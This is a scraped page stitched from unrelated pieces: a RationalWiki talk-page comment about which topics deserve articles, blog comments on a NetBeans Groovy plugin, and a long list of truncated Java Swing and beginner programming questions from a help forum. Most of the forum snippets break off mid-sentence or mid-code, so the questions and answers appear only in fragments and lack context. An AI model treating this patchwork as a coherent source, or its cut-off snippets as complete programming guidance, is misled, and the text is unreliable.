- The fighting over "what is mission" is really quite tiring, I think. Let the articles speak for themselves. Why shouldn't we have an article on Spice Girls, we have articles on every single right wing nutjob from here to Nantucket. To me, the issue should always be how the author presents the material, and if when you read it, it adds something to your knowledge about anything "Rational Wiki" which has long outgrown the idea that we just refute bad science. The Right holding these guys up as horrors, because they have opinions the Right disagrees with (while at the same time fawning over Toby Keith) is something that should be addressed.
GodotGrow a vagina 20:47, 15 February 2012 (UTC)
- And I still say, by the way, if someone wants to write a RationalWiki article about manila folders, and really shows why they should matter to us, that's a RW article. Hard lines are not nearly as important as really looking at what makes our society see some people (or things) one way, and others in a different light - and that's very RWish.
GodotGrow a vagina 20:48, 15 February 2012 (UTC) | https://rationalwiki.org/wiki/Talk:Bob_Dylan | CC-MAIN-2019-22 | refinedweb | 2,959 | 60.35 |
Tried it and seem to have a problem with this little Groovy script ..
-----------------------------------
println 'I can see this ..'
def clos = {println "${it} ... "}
clos('But not this')
println 'Can this though ..'
-----------------------------------
In the output i see ...
-----------------------------------
I can see this ..
Can this though ..
-----------------------------------
So the output from the closure is lost ..
This doesn't happen when I run the code in
the GroovyConsole - I get ..
-----------------------------------
groovy> println 'I can see this ..'
groovy> def clos = {println "${it} ... "}
groovy> clos('But not this')
groovy> println 'Can this though ..'
I can see this ..
But not this ...
Can this though ..
----------------------------------
Anyone have any idea? I'm new to Groovy ..
Posted by Rob on December 06, 2007 at 11:40 AM PST #
Yes. Please read this blog entry:
Posted by Geertjan on December 06, 2007 at 12:35 PM PST #
Thank you very much for the quick reply .. And I really like the plugin ..
Posted by Rob on December 06, 2007 at 03:05 PM PST #
Thank you for your effort. I've been looking for this for a long time. I'm disappointed that Sun didn't focus on Groovy. Instead they have spent so much effort on Ruby. And NetBeans' Ruby support is awesome. But I don't think it will be that interesting for most Java developers. It's too far from Java. But Groovy is a nice match for the Java community. I really hope Sun can realize that and spend their money on the right technology.
I have tried your plugin, it's easy to setup and works fine. It's great.
But I think the functionality is limited. I'm trying to use Groovy to write unit tests for Java classes in a Maven2 project. But it seems the Java classes are not in the Groovy classpath; they are not visible in Groovy. Do I miss something? Another thing: I hope I can debug Groovy. At least I could put a breakpoint in Java code, then start the Groovy unit test, and the Java code would break. That would be helpful. I understand that is not an easy task.
Thanks.
Posted by jianwu on December 07, 2007 at 07:08 AM PST # | http://blogs.sun.com/geertjan/entry/groovy_plugin_updates_to_netbeans | crawl-002 | refinedweb | 355 | 88.02 |
Need Help with Java-SWING programming - Swing AWT
Need Help with Java-SWING programming Hi sir,
I am a beginner... with a program in swing. Could you help me with an example?
Regards
Sreejith ...
Thanks
PROJECT ON JAVA NET BEANS AND MYSQL !! PLEASE HELP URGENT
PROJECT ON JAVA NET BEANS AND MYSQL !! PLEASE HELP URGENT i need a project based on connectivity..it can be based on any of the following topics...
urgent help for inserting database in a project
urgent help for inserting database in a project I need some urgent help
i have made java application for conducting a quiz which displays 25 mcq's and then the result at the end.I need to add simple database connectivity
plz help -java project very urgent
plz help -java project very urgent ? Ford furniture is a local... person will get 60% of the value above half price. For example, if a luxury bed.... For example, if a dining set is priced at 3000, and was sold at 30% discount, the sales
urgent need in two days - JSP-Servlet
the output.This Example is a good mix of various Java Technologies such as Servlet... the Mysql and Jdbc database connectivity code through example. See the Given JSP Example Code-------------------------------Servletform.html<
pls help me it urgent
pls help me it urgent hey, pls help me i want to know that can we call java/.bat file from plsql/proceudre /trigger
Urgent java programming question.Pls help
Urgent java programming question.Pls help Q1. Generate 10 thousand random integers with values in the range between 1 to 100.
Q2. Store each randomly generated number into a node and then attach the node to a linked list
Please help me... its very urgent
Please help me... its very urgent Please send me a java code to check whether INNODB is installed in mysql...
If it is there, then we need to calculate the number of disks used by mysql
Need urgent help with C++ errors!
Need urgent help with C++ errors! hi,
i'm new to C++ programming... don't know what to do.
Please help!!
#include<iostream.h>
void main... help
urgent...pleAse help me.....please!
urgent...pleAse help me.....please! please help me urgent! how can i do dictionary with the use of array code in java, where i will type the word then the corresponding meaning for that word will appear...thanks
seriously need help....
seriously need help.... Write a program that will prompt the user... program.
Use each of the following Java statements at least once in your program.... Example On-Peak Cost ==== $25.36
Parameters
- rate band
- cost
swing program plz urgent sir - Java Beginners
swing program plz urgent sir
hi sir,i waan a jtable swings program table having column names "itemid","price".Initially table having single empty row.whenever we click the "enter" button automatically new row will be insert
Help Required - Swing AWT
JFrame("password example in java");
frame.setDefaultCloseOperation...();
}
});
}
}
-------------------------------
Read for more information.
Thanks.
Amardeep
Need Help in Java programming
Need Help in Java programming Hello. Can someone please help me with writing the following program
Java program that gives assignment details such as:assignment number,assignment name,due date,submission date,percentage marks
java swings - Swing AWT
. swings I am doing a project for my company. I need a to show... write the code for bar charts using java swings. Hi friend,
I am
Need Help - Java Beginners
Need Help Hello Sir,
Am a beginner of Java. Also i did course... projects in Java as well as J2EE...
Can u help me and guide to do a project.../reference/tutorials/
http
need help - Java Beginners
need help Need help in programming in Java Simple java program that will show the output within quotes using system.out.println();DISPLAYING OUPUT " * " ," *** " ........I used System.out.print
Programming Help URGENT - JSP-Servlet
Programming Help URGENT Respected Sir/Madam,
I am R.Ragavendran. I am in urgent need of the coding. My requirement is as follows:
Beside..., connection for JDBC codings are present..
NOTE: When User clicks Insert,for example
Need help - Java Beginners
Need help To Write a Java program that asks the users to enter a m * n matrix of integers, m and n being the
number of rows and columns...; Hi Friend,
Please try the following code. We hope that this code will help
Need help in java programming
Need help in java programming Hello.
Can someone please help me with writig the following programm.
Assignment 20%
Presentation 10%
Mini Test 10%
Exam 60%
Java program that accepts the following details: student
need help with a program - Java Beginners
Java algorithm - need help with a program Java algorithm - need help with a program
need help. - Java Beginners
Sales System.. Need Help!! - Java Beginners
Sales System.. Need Help!! were going to make a sales system in our... any idea of this. Can you please give us an example how we will make it... Pls help us.. Thank you very much for your reply in my past questions you are a big
java swing (jtable)
java swing (jtable) hii..how to get values of a particular record in jtable from ms access database using java swing in netbeans..?? please help..its urgent..
Here is an example that retrieves the particular record
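The database part of the question can't be reproduced here, but the JTable side can: a minimal sketch, assuming the rows have already been fetched and loaded into a DefaultTableModel (the class name and the itemid/price data are made up for illustration). Reading a particular record back is just a matter of asking the model for the value at a row/column pair:

```java
import javax.swing.table.DefaultTableModel;

public class TableRecordSketch {
    // Build an in-memory table model standing in for rows fetched from a database.
    static DefaultTableModel buildModel() {
        String[] cols = {"itemid", "price"};
        Object[][] rows = {{"A100", 25}, {"A101", 40}};
        return new DefaultTableModel(rows, cols);
    }

    // Return the value stored at (row, column) -- what a JTable built on this
    // model would display in that cell.
    static Object cellValue(DefaultTableModel m, int row, int col) {
        return m.getValueAt(row, col);
    }

    public static void main(String[] args) {
        DefaultTableModel m = buildModel();
        System.out.println(cellValue(m, 1, 1)); // price of the second record: 40
    }
}
```

In a real application the JTable would be constructed with `new JTable(model)`, and the same `getValueAt` calls work against the table's model.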
need help - Swing AWT
need help Create a program to correct and grade a set of multiple choice test result. this is a console program that uses JOptionPane dialog boxes as well.
Must read a set of 10 correct answers, using a JOptionPane dislog box
need help with a program - Java Beginners
need help with a program Part I An algorithm describes how... by the user. The output of the program should be the length and width (entered.... First you would need to make up the "test data". For this algorithm, the test data
urgent - Java Interview Questions
Thanks... display the url one by one using core java technology
(e.g)when am requesting
Java Programming Need Help ASAP
Java Programming Need Help ASAP You are required to develop..., maths mark, communications mark. You will then need accessor and mutator methods... class that creates an array of Students and handles it. You will need
URGENT: User Defined Classes - Java Beginners
URGENT: User Defined Classes Can someone help me?
Design...
Here, you will get different data.... For example, if the current day is Monday and we add four days, the day
Swing - Java Beginners
: Hi friends. I need a swing programming book for free download... links:
Need *Help fixing this - Java Beginners
Need *Help fixing this I need to make this program prompt user... and maybe add retrieve function //need help with this one badly. Thanks guys for all the help.
import java.text.*;
import javax.swing.*;
import java.awt.event.
PLZ Need some help JAVA...HELP !!
PLZ Need some help JAVA...HELP !! Create a class names Purchase Each purchase contains an invoice number, amount of sale and amount of sales tax. Include set methods for the invoice number and sale amount. Within the set
Need an Example of calendar event in java
Need an Example of calendar event in java can somebody give me an example of calendar event of java
Java swing - Java Beginners
Java swing Hi,
I want to copy the file from one directory... will be displayed in the page and progress bar also.
Example,
I have 10 files... ,its very very urgent
Java swing - Java Beginners
Java swing Hi,
I want to copy the file from one directory... will be displayed in the page and progress bar also.
Example,
I have 10 files... will be displayed.
Please send the sample code ,its very very urgent.
Thanks
urgent please, help!
urgent please, help! how to make jTable unclickable and have unmovable columns, thanks in advance
import javax.swing.*;
import java.awt.... frame = new JFrame("Creating JTable Component Example!");
JPanel panel = new
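The snippet above is cut off, but the usual approach for an "unclickable" table with frozen columns is two-fold: override isCellEditable so no cell ever opens an editor, and turn off header reordering. A runnable sketch (class name and sample data are made up):

```java
import javax.swing.JTable;
import javax.swing.table.DefaultTableModel;

public class FrozenTableSketch {
    // A model whose cells refuse edits, so clicking a cell never starts editing.
    static DefaultTableModel readOnlyModel() {
        Object[][] rows = {{"r1c1", "r1c2"}, {"r2c1", "r2c2"}};
        String[] cols = {"Col A", "Col B"};
        return new DefaultTableModel(rows, cols) {
            @Override
            public boolean isCellEditable(int row, int column) {
                return false; // every cell is read-only
            }
        };
    }

    static JTable frozenTable() {
        JTable table = new JTable(readOnlyModel());
        // Stop the user from dragging columns into a new order.
        table.getTableHeader().setReorderingAllowed(false);
        return table;
    }

    public static void main(String[] args) {
        JTable t = frozenTable();
        System.out.println(t.isCellEditable(0, 0));                     // false
        System.out.println(t.getTableHeader().getReorderingAllowed()); // false
    }
}
```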
Java Swing Open Browser
that will open the specified url on the browser using java swing. This example will really helpful if you need to show the help window for your application. Here, we have...Java Swing Open Browser
Java provides different methods to develop useful
JAVA SWING
JAVA SWING Hi....
Iam doing project in java...and my front end in swing ..our project is like billing software...
then what are the topics i want cover? then how to design?
pls help me
java - Swing AWT
java hi can u say how to create a database for images in oracle and store and retrive images using histogram of that image plz help me its too urgent
java swing.
java swing. Hi
How SetBounds is used in java programs.The values in the setBounds refer to what?
ie for example setBounds(30,30,30,30) and in that the four 30's refer to what
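The four arguments are x, y, width, height: the first two place the component's top-left corner inside its parent (which needs a null layout for manual positioning to stick), and the last two set its size in pixels. A quick check:

```java
import javax.swing.JPanel;

public class SetBoundsDemo {
    public static void main(String[] args) {
        JPanel panel = new JPanel();
        // setBounds(x, y, width, height): position of the top-left corner
        // within the parent, then the component's size in pixels.
        panel.setBounds(30, 40, 200, 100);
        System.out.println(panel.getX() + " " + panel.getY());          // 30 40
        System.out.println(panel.getWidth() + " " + panel.getHeight()); // 200 100
    }
}
```

So `setBounds(30,30,30,30)` means a 30x30-pixel component whose top-left corner sits 30 pixels right and 30 pixels down from the parent's origin.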
help in java
help in java Define a class named Money whose objects represent... and a single argument. For
example, this version of add method (for addition) has...; for example, there should be two methods named add.
Write a test program for your
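A minimal sketch of the overloading part of the assignment — two methods that share the name add but differ in parameter lists. The dollars/cents representation and normalization rule are assumptions (negative amounts aren't handled here):

```java
public class Money {
    private final int dollars;
    private final int cents;

    public Money(int dollars, int cents) {
        // Normalize so cents always stays in 0..99.
        int total = dollars * 100 + cents;
        this.dollars = total / 100;
        this.cents = total % 100;
    }

    // Overload 1: add another Money object.
    public Money add(Money other) {
        return new Money(dollars + other.dollars, cents + other.cents);
    }

    // Overload 2 (same name, different parameter list): add a raw amount.
    public Money add(int d, int c) {
        return add(new Money(d, c));
    }

    public int getDollars() { return dollars; }
    public int getCents()   { return cents; }

    public static void main(String[] args) {
        Money a = new Money(3, 75);
        Money b = a.add(new Money(1, 50)); // 5 dollars 25 cents
        System.out.println(b.getDollars() + " dollars " + b.getCents() + " cents");
    }
}
```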
java swing - Swing AWT
:
Thanks...java swing how to add image in JPanel in Swing? Hi Friend,
Try the following code:
import java.awt.*;
import java.awt.image.
Need source code - Swing AWT
Need source code Hai, In java swing, How can upload and retrieve the images from the mysql database? Hi Friend,
To upload and insert image in database, try the following code:
import java.sql.*;
import
guys,, need help,, in java programing,, arrays
guys,, need help,, in java programing,, arrays create a program where you will input 10 numbers and arrange it in ascending way using arrays
Java swing
are displayed in the table..I need the source code in java swing...Java swing If i am login to open my account the textfield,textarea and button are displayed. if i am entering the time of the textfield
Urgent requirement
Urgent requirement I want to implement Autocompletion code for Jcombobox in swing can you please help me out from
urgent need
urgent need Input a line. Count the number of words that start with a capital letter
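The one-line exercise above can be sketched like this; the sample string is a made-up stand-in for the line a user would type:

```java
public class CapitalCount {
    // Count the words whose first character is an uppercase letter.
    static int countCapitalWords(String line) {
        int count = 0;
        for (String word : line.trim().split("\\s+")) {
            if (!word.isEmpty() && Character.isUpperCase(word.charAt(0))) {
                count++;
            }
        }
        return count;
    }

    public static void main(String[] args) {
        // "The", "Brown" and "Jumps" start with capitals -> 3
        System.out.println(countCapitalWords("The quick Brown fox Jumps over"));
    }
}
```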
Java Swing Tutorials
with the help of Java 2D API.
Data Transfer
Swing... how to create the
JTabbedPane container in Java Swing. The example...
components with the help of grid in Java Swing. The grid layout provides
need help on writing a program. - Java Beginners
Writing first Java Program Hi, I need help to write my first Java... roseIndia to get your query solved. check given link to see the solution of your Java problem.
urgent - JSP-Servlet
Simple Jsp and Java Example Simple Jsp and Java Example
help i need help with this code.
write a java code for a method named addSevenToKthElement that takes an integer array, and an integer k as its arguments and returns the kth element plus 7.
any help would be greatly
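A direct sketch of the method described above. The question doesn't say whether k counts from 0 or 1, so this assumes 0-based indexing; adjust by one if 1-based is intended:

```java
public class KthElement {
    // Returns the kth element of the array plus 7 (k is a 0-based index).
    static int addSevenToKthElement(int[] values, int k) {
        return values[k] + 7;
    }

    public static void main(String[] args) {
        int[] data = {10, 20, 30};
        System.out.println(addSevenToKthElement(data, 2)); // 30 + 7 = 37
    }
}
```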
I need your help - Java Beginners
I need your help What is the purpose of garbage collection in Java, and when is it used? Hi check out this url :
Need help in constructing bubble sort
Need help in constructing bubble sort using a bubble sort, for each entry in the array, display the original index of the first dimension...
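The snippet above is truncated, but the core bubble sort it asks about looks like this — repeatedly swap adjacent out-of-order neighbours so that after pass i the largest remaining value has "bubbled" to the end (the sample data is made up):

```java
import java.util.Arrays;

public class BubbleSortSketch {
    static void bubbleSort(int[] a) {
        for (int i = 0; i < a.length - 1; i++) {
            for (int j = 0; j < a.length - 1 - i; j++) {
                if (a[j] > a[j + 1]) {
                    int tmp = a[j];    // swap the out-of-order pair
                    a[j] = a[j + 1];
                    a[j + 1] = tmp;
                }
            }
        }
    }

    public static void main(String[] args) {
        int[] data = {5, 1, 4, 2, 8};
        bubbleSort(data);
        System.out.println(Arrays.toString(data)); // [1, 2, 4, 5, 8]
    }
}
```

Tracking each entry's original index (the part of the question that was cut off) can be done by sorting an array of index/value pairs with the same loop.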
scrolling a drawing..... - Swing AWT
,
I am sending you a link. This link will help you. Please visit for more information.... is dynamic and hence there is no fixed size, that's why i need to make
Java swing code - Java Beginners
://
I hope this would be helpful to you...Java swing code How to set a font for a particular cell in JTable? Hi Friend,
Please visit the following link for any kind of help
Java Question Anyone need some HELP !!
Java Question Anyone need some HELP !! Create a file that contains... of the two files.
Note: For the above code, you need POI api.
import... and poi-scratchpad-3.2-FINAL-20081019.jar files into the following path:
\Java
SWING
SWING A JAVA CODE OF MOVING TRAIN IN SWING
jtable in java swing
jtable in java swing hai friends...
i am creating 1 GUI having 1.... It gets filled through program. I need to develop such application. After... in the 3rd column.like way..
Some 1 please help me to develop such application
Design a Toll bar - Swing AWT
a link. This link will help you.
Please visit for more information.
Thanks...(Standard/Formating Tool bar).
it's very urgent.
Thanks in Advance.
Thanks
need help pleaseee....i weak in java
need help pleaseee....i weak in java QUESTION 1
You are required to write an application called Customer Billing System. This system... meter reading, current meter reading and charges. Write a structured Java program
need help with java program as soon as possible
need help with java program as soon as possible So my assignment is to write a program that used while loops to perform 6 different things.
1. prompt the users to input two integers: firstNum and secondNum (firstNum must be less
( Inheritance,need help in Polymorphism, Overriding) - Java Beginners
( Inheritance,need help in Polymorphism, Overriding) can any one please help me create this application,thank you
Advanced Concepts with Classes( Inheritance, Polymorphism, Overriding)
Employees in a company are divided
Java Swing : JLabel Example
In this tutorial, you will learn how to create a label in java swing
need help creating a lift program - Java Beginners
need help creating a lift program Classes, Methods, Constructors
please i need help to create an elevator program
Simulating an Elevator
write... for any help rendered
Need help writing a console program
Need help writing a console program I need help cant seems to figure it out!
Write a program that consists of three classes. The first class...):
This is a test, this is only a test!
This test is a test of your Java programming
Java swing
Java swing Design an appliaction for with details such as name,age,DOB,address,qualification and finaly when we click the view details button all types details should be displayed in another View in TextView's..I need the sample
I need your help - Java Beginners
I need your help For this one I need to create delivery class for a delivery service .however, this class should contain (delivery number which... the file name is ApplicationDelivery.java
Your program must follow proper Java
need of java coding - JavaMail
need of java coding Design a java interface for ADT stack. Develop it and implement the interface using link list. Provide necessary exception handling for that implementations.
pls mail me this lab program..its urgent
I need help in doing this. - Java Beginners
I need help in doing this. Student DataBase
i will need creating a program that will be
used to manipulate a student database. This portion..., and the student's GPA.using arrays and objects, need to structure the information
Urgent programming assignment
Urgent programming assignment Hi,
I am an Indian student in USA.I have been able to write all the java codes successfully , however this one is giving me tremors.Any help would be highly appreciated.I am attaching
Swing - Applet
information on swing visit to : Hello,
I am creating a swing gui applet, which is trying to output all the numbers between a given number and add them up. For example
java swing and CSS
java swing and CSS can css be used in java swing desktop application in different forms for better styles?plzz help
swing
swing Write a java swing program to delete a selected record from a table
Java - Swing AWT
Java Hi friend,read for more information,
Query on Java Swing - Table Cell Issue - Swing AWT
Query on Java Swing - Table Cell Issue Hi,
I have a query on Java Swing.
we are using swing in our application, In one of the frame we... unable to show the cursor in the focused cell which is editable.
what do I need do
Create a JRadioButton Component in Java
button in java swing. Radio Button is like check box. Differences between check... with the help of this program. This example provides two radio
buttons same...
Create a JRadioButton Component in Java
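The mutual-exclusion behaviour described above comes from ButtonGroup, not from the buttons themselves: selecting one member of a group automatically deselects the others. A sketch with two made-up buttons:

```java
import javax.swing.ButtonGroup;
import javax.swing.JRadioButton;

public class RadioSketch {
    // Two radio buttons made mutually exclusive by a shared ButtonGroup.
    static JRadioButton[] makePair() {
        JRadioButton yes = new JRadioButton("Yes", true); // starts selected
        JRadioButton no  = new JRadioButton("No");
        ButtonGroup group = new ButtonGroup();
        group.add(yes);
        group.add(no);
        return new JRadioButton[]{yes, no};
    }

    public static void main(String[] args) {
        JRadioButton[] pair = makePair();
        pair[1].setSelected(true); // picking "No" clears "Yes"
        System.out.println(pair[0].isSelected() + " " + pair[1].isSelected());
    }
}
```

This differs from check boxes exactly here: without the ButtonGroup, both buttons could be selected at once.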
i need latest oracle certified java dumps.. Pleas help me?
i need latest oracle certified java dumps.. Pleas help me? i need latest oracle certified java dumps.. Pleas help me
help - Java Beginners
help hi,i am new to java & i do not have progamming background, i just run the hello world example given, but i am not seeing the output, it just shows the c:\javatutorial> in the command prompt, is there any setting i need
java help
java help How to Open CSV Files in a Microsoft Excel Application Using Java Code with example pgm
reply me its urgent - Java Beginners
reply me its urgent Hi friends
I am facing problem in my application in this type please help me
i am using database mysql5.0 version... urgent. hi friend,
i think password is wrong or username may be wrong